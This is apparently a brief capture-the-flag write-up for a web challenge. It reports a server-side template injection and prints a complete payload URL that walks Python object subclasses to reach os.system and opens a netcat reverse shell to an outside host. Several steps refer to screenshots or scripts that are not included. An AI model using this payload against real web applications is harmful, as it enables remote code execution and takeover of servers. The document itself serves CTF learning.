Synopsis

Let's do this, the log in page doesn't really work
Hum, this page could be interesting


Injection

There is an SSTI on this page


Shell road

Let's spawn reverse shell, here is the payload.
http://dctf1-chall-injection.westeurope.azurecontainer.io:8080/{{().__class__.__base__.__subclasses__()[186]()._module.__builtins__["__import__"]("os").system("nc mrfey.fr 8888 -e /bin/sh")}}
            


Here is my shell

Flag

I found this script on the remote server.


And now we can flag